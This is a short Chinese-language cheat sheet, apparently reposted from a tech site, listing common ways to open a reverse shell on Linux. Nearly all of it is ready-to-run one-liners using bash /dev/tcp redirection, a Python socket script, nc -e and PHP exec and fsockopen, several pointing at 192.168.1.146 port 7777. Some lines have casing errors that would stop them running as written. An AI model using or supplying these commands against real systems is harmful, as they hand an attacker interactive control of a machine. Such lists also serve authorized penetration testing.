[整理]Linux下几种常见的反弹shell方式
方法1:使用linux命令反弹shell
反弹shell命令格式如下:
bash -i >& /dev/TCP/IP/port 0>&1
方法2:使用python反弹shell
反弹shell命令格式如下:
python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.soCK_STREAM);s.connect(('ip',port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"
方法3:使用nc反弹shell
命令如下:
[root@localhost ~]# nc -e /bin/bash 192.168.1.146 7777
方法4:使用PHP反弹shell
1).使用PHP的exec函数执行方法1反弹shell的命令
[root@localhost ~]# PHP -r 'exec("/bin/bash -i >& /dev/tcp/192.168.1.146/7777");'
2).使用PHP的fsockopen去连接远程
命令格式如下:
PHP -r '$sock=fsockopen("ip",port);exec("/bin/bash -i <&3 >&3 2>&3");'
执行以下命令:
[root@localhost ~]# PHP -r '$sock=fsockopen("192.168.1.146",7777);exec("/bin/bash -i <&3 >&3 2>&3");'
版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 [email protected] 举报,一经查实,本站将立刻删除。
